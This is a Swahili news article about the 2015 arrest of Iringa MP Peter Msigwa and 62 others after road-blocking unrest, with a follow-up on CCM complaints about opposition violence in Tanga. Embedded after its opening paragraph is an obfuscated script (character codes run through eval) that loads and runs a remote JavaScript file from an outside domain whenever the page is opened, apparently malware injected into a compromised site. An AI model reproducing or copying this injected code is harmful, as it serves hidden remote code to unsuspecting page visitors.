Recent Comments

Msigwa, wengine 62 mbaroni

By Baraka Bitariho Sep 30, 2015
<p>Mbunge wa Iringa Mjini anayemaliza muda wake, Mchungaji Peter Msigwa </p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
Mbunge wa Iringa Mjini anayemaliza muda wake, Mchungaji Peter Msigwa
Mbunge wa Iringa Mjini anayemaliza muda wake, Mchungaji Peter Msigwa

WATU 62, akiwemo Mbunge wa Iringa Mjini aliyemaliza muda wake, Mchungaji Peter Msigwa (Chadema), wanashikiliwa na Polisi kwa tuhuma za kuhusika kufanya fujo na kufunga barabara mjini hapa.

Kamanda wa Polisi wa Mkoa wa Iringa, Ramadhan Mungi alitoa taarifa hiyo jana mkoani hapa kwa waandishi wa habari na kusema waliokamatwa, wanasadikiwa kuwa wafuasi wa Chama cha Demokrasia na Maendeleo (Chadema).

Akieleza sababu za kumkamata Msigwa ambaye ni mgombea wa Jimbo la Iringa Mjini, Kamanda alisema yeye hakuwepo eneo la tukio, isipokuwa anatuhumiwa kutoa hamasa kosa lifanyike. “Katika kutenda makosa, hakuwapo pale katika eneo, lakini wakosaji wakuu wako katika makundi manne.

Kuna anayetenda makosa kwa mkono wake, kuna yule anayewezesha, kuna anayesaidia, hata mshauri au kutoa hamasa kwa watu kutenda makosa. Yeye ndiye huyo wa la nne,” alisema.

Akielezea tukio, Kamanda alisema juzi saa 12 jioni wafuasi hao walikuwa kwenye barabara inayotoka Iringa mjini kwenda eneo la Kihesa, wakiwa wamezuia barabara na kucheza katikati ya barabara.

Alisema akiwa katika mkutano wa mgombea urais wa Chama Cha Mapinduzi (CCM), Dk John Magufuli, zilipatikana taarifa kwamba waendesha bodaboda zaidi ya 150, walikuwa wamekusanyika katika hoteli ya Sambala.

“Tukafuatilia kuona kwa nini wamejikusanya; tukafuatilia tukaona wako kwenye kikao chao cha ndani. Hatuna usumbufu na watu wanaofanya vikao vyao vya ndani kwani ni haki yao,” alisema Kamanda Mungi. Hata hivyo, alisema mkutano wao ulipoisha, wale watu walitoka na kuingia barabarani na kuanza kucheza wakizuia watu na magari kupita.

Alisema alimwagiza mkuu wa kikosi cha kutuliza ghasia (FFU) akawaondoe watu hao barabarani. Kwa mujibu wa kamanda, Mkuu wa FFU alipotaka kuwaondoa kwa amani, walikaidi na alipojaribu kutumia nguvu, walianza kumrushia mawe na kukimbilia kwenye hoteli waliyokuwa wakifanyia mkutano.

Alisema FFU waliingia kwenye hoteli hiyo na kukamata baadhi; tukio ambalo lilisababisha wengine kuumia kutokana na kuruka ukuta na wengine kuanguka. Akitoa taarifa hizo jana mchana, Kamanda alisema walitarajia kufikisha watuhumiwa hao mahakamani wakati wowote.

Kamanda alionya vyama vya siasa na viongozi wake kuepuka vitendo vinavyoashiria kuhatarisha usalama. Alisema katika kipindi hiki cha nusu ya kampeni kuelekea siku ya uchaguzi, upo mhemko mkubwa wa kisiasa ikilinganishwa na siku za mwanzoni.

“Sasa hivi tuko karibu nusu ya muda wa kampeni. Kipindi cha awali, kimekwenda vizuri. Kwa mfano katika Mkoa wa Iringa, Kuanzia tarehe ishirini na mbili hadi tarehe thelathini mwezi wa nane hakuna kosa hata moja lililotendeka pale kuhusiana na kampeni,” alisema kamanda.

Alisema Septemba mosi hadi Septemba 5, yaliripotiwa makosa sita. Septemba 5 hadi 19, kulikuwa na makosa 17 ambayo kati ya hayo, ambayo kati yake, 15 yalitokea Iringa mjini na yaliyobaki ni ya Kilolo. Alisema kadri inavyoelekea katika uchaguzi, watu wanapata mihemko na kusahau kanuni ya maadili ya uchaguzi.

Aliwaomba viongozi wa siasa kuzingatia maadili, wawaelekeze na kuwaelimisha wafuasi wao wayafuate. “Tusipofanya hivyo, amani itavurugika. Sisi polisi Iringa hatutakuwa na huruma na chama chochote, mtu yeyote ambaye anaonesha dalili zozote za kuvuruga amani katika mkoa wetu wa Iringa,” alisema.

Alisisitiza, “sisi amani ni kipaumbele cha kwanza, mengine yote yatafuata. Yeyote anayetishia amani Iringa, anatishia kazi ya polisi, hatutamvumilia.” CCM yasikitishwa Naye Emmanuel Ghula, anaripoti kuwa Chama Cha Mapinduzi (CCM) kimeelezea kusikitishwa na kitendo cha wafuasi wa vyama vinavyounda Ukawa kupiga mawe, kurusha chupa na kuharibu ofisi za chama hicho mkoani Tanga juzi wakati wa kampeni.

Kwa mujibu wa taarifa iliyotolewa jana na Mjumbe wa Kamati ya Kampeni ya CCM, January Makamba, wafuasi wa vyama vinavyounda Ukawa ambavyo ni Chadema, CUF, NCCR-Mageuzi na NLD, walisababisha uharibifu mkubwa katika ofisi za chama hicho mkoani Tanga wakati wa kampeni.

“Tunasikitika sana kwa wenzetu kukosa ustaarabu katika kampeni zao kwani mikutano yote ya CCM imekuwa ikifanyika katika hali ya amani, utulivu na ustaraabu,” alisema. Makamba alisema kampeni zimekuwa zikienda vizuri, lakini vijana wa vyama vinavyounda Ukawa wamekuwa wakisababisha uvunjifu wa amani katika mikutano ya CCM, lakini CCM wao wamekuwa wakiendesha kampeni zao kistaraabu.

Alisema ni lazima watanzania waelewe kuwa uchaguzi utapita na taifa litabaki, hivyo ni vyema wananchi wote hasa viongozi wa vyama vya siasa kuendesha kampeni zao kistaarabu pasipo kusababisha vurugu.Habari Leo

By Baraka Bitariho

Simamia is a news house where visitors will get up to date information on news, events, and so on. Join us to get updated, entertained and learn. Our website is www.Simamia.com or email us at SimamiaTeam@gmail.com